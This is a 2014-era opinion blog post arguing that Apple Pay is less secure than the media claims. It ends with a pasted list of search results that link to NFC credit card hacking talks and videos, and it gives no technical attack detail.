Apple Plays

Apple introduced the iPhone 6’s this week and spent time talking about the size, display and CPU speed but it also spent an exorbitant amount of time, marketing dollars  and effort to push a new feature most people could really care less about, Apple Pay.

What is Apple Pay?

Apple Pay is a payment service on the iPhone that stores and transmits your credit card information.  Let that sink in before moving on.

iPay-01

Apple has not released much in the way of details yet on exactly how Apple Pay works to the public and the media has several different guesses of how it thinks the system will work.  Gartner claims no credit card information will be stored on the phone, using your iTunes credit card information, others including Apple say your card details will be stored on the phone.  The Washington Post writer assures his readers that by using the iPhone finger print reader no one else will be able to make purchases with your phone.  He doesn’t bother to mention how the fingerprint reader was also hacked, in less than two days after it was released.  And that  virtual card numbers are what will be sent to the merchant from your phone instead of your actual card number.

Using the docs from stripe.com, a third party offering an API to allow merchants to use Apple Pay without needing to do all the integration on their own it would seem that credit card information is stored on your iPhone and depending on the merchant you are using you will be sending them your card number, CVC code, name, expiration date and billing address, all information that they can choose to store for later use if they decide they want to.  Stripe.com’s documentation includes frightening phrases including “Make sure any communication with your server is SSL secured to prevent eavesdropping.”  Shouldn’t Apple Pay force SSL communication?

This is all speculation at this point but I think Stripe.com likely has better information than the Washington Post and Gartner at this point.

However, I couldn’t leave out this little gem out from Makeuseof.com as they stay in lock step with the party line claiming anyone who doesn’t fully embrace Apples latest feature as the greatest change to the monetary system since the advent of coins is a lunatic alien abductee.

“Those of you reaching for your tinfoil hats will be relieved to hear the usual security and privacy spiel from such an announcement involving sensitive financial data. Merchants cannot see card numbers, Apple cannot tell what you are buying, and if you lose your phone, you can simply suspend the service using Find My iPhone.”

All but the last part about using Find My iPhone is incorrect, but it doesn’t matter because they don’t address the real security concerns.

Update: According to Nerd Wallet, Apple will get 0.15% of each transaction paid to them by the bank issuing the credit card.  This new additional fee on top of the regular fees paid per transaction for the convenience of using a card instead of cash will unwittingly be paid for by consumer.  When you think about the concept of paying a company to lend you your own money with interest and fees added on to it you may begin to understand that using cash and living within a realistic budget is better than using Apple or any credit card company.

The Real Point Please?

Here is the main problem with what Gartner, WAPO all of the internet sites claiming there is nothing to worry about.  They all talk about how the transaction is secure, how the merchant doesn’t actually get your card details, how a random number or one time token is going to keep your purchase secure.  Great.  But what about the phone?  How secure is the device where you are storing the cards?  With all the information needed to use each one of your cards.  I don’t recall Apple talking about how secure their phone and new OS are, none of the websites fighting for your precious monetized clicks talk about how secure the platform storing all your data is.  Instead they make claims to ensure you that Apple has it all figured out, after all it’s Apple! They never have security problems, just ask Kate Upton, Kirsten Dunst, Jennifer Lawrence or Jonathan Zdziarski.  Jonathan is the researcher that presented a paper recently on how every iOS device is running hidden and undocumented services that allow access to phone data even the ability to bypass the iTunes backups encryption all without needing physical access to your phone.  Which it doesn’t take much thought to figure out exactly how someone could get at all the photos of all celebrities, your spouse or your own photos stored in iCloud.

When Target and the other retailers had their POS systems hacked, they did not attack the individual payments, they wanted the card data so they could sell the cards on the market and then those who bought the cards would use them to make fraudulent purchases, clean out accounts or worse.  Talking about how a single transaction is secure is only interesting if you are a merchant, bank, card processing company or Apple.  The consumer loses nothing if a retailer or bank doesn’t secure their transaction because they are covered.  But if the consumer has their savings account drained to $0, well they are just out all of their savings.  The banks, card processor and retailer will happily take that stolen money.

One Last Thing

Apple Pay uses NFC to transmit your purchase details.  In 2012, 2013 and 2014 there have been demonstrations on how to hack NFC to take advantage of payment systems to steal data, send payments and transfer funds.  It’s unfortunate that Apple and the media won’t spend the 30 seconds it takes to Google NFC credit card hack and watch the videos, read the conference notes and articles on how insecure NFC really is.

Apps use NFC technology to hack Credit Card credentials
Oct 16, 2013 – After months Google still hasn’t fixed the issue letting Apps from the Play Store use NFC technology to steal Credit Card credentials.
[PDF] NFC Hacking: The Easy Way – Def Con
https://www.defcon.org/images/…/DEFCON-20-Lee-NFC-Hacking.pdf
by E Lee – ‎Cited by 5 – ‎Related articles

NFC Hacking: The Easy Way. DEFCON 20 … between chipped credit cards and POS terminals … Contactless Credit card reader (e.g. VivoPay, Verifone).
[PDF]Hacking the NFC credit cards for fun and debit – Hackito …
Apr 3, 2012 – Hackito Ergo Sum 2012 – April 12,13,14 – Paris, France. 4. How to recognize an NFC-enabled credit card? ○. Small wave logo printed on the  …

How NFC phones can steal your credit card info. – YouTube
Jan 27, 2012 – Uploaded by Id Stronghold

How NFC phones can steal your credit card info. … Building a RFID Zapper – Hacking a Disposable Camera by Tobias Othmar Hermann  …

Hacking the NFC credit cards for fun and debit by … – YouTube
www.youtube.com/watch?v=VWIzW0rRw_s
Jul 24, 2012 – Uploaded by Shakacon LLC

Hacking the NFC credit cards for fun and debit by Renaud Lifithitz … The way of do business very much easy using NFC business card..

[NFC HACK] : Use Pass Snow card or transport card with
www.youtube.com/watch?v=B0pTdNrEXnI
Mar 8, 2013 – Uploaded by iHeathOfficial
[NFC HACK] : Use Pass Snow card or transport card with your … Cloning Credit Cards: Pre-play and downgrade attack (full length) by Michael  …

Android NFC hack lets subway riders evade fares | Naked …

nakedsecurity.sophos.com/…/android-nfc-hack-lets-subway-rider…
Sep 24, 2012 – Android NFC hack lets subway riders evade fares … Benninger said during his talk that he could replenish his card endlessly, according to Computerworld: “I can do …. Carwash POS systems hacked, credit card data drained.

Credit Card stealing Apps from NFC cards – Latest News …
www.secure-commerce.org/…/credit-card-stealing-apps-from-nfc-cards/
Apr 29, 2013 – This report in Mashable and CBS reports that there’s app’s now available to read and hack the NFC data on credit cards with the purpose of  …

The Perfect Hack for Enabling NFC Credit Card Payments …
www.businessinsider.com/the-perfect-hack-for-enabling-…
Business Insider
Aug 3, 2011 – Remember the good ol’ days when you actually had to swipe your credit or debit card to make a pay…

Hacking the NFC Credit Cards for Fun and Debit by Renaud …
www.slideshare.net/…/hacking-the-nfc-credit-cards-for-fun-and-debit-by…
Jul 2, 2012 – Small wave logo printed on the card: “Hacking the NFC credit cards for fun and debit ;)” Renaud Lifchitz – BT 4 Shakacon 2012 – June 18-21  …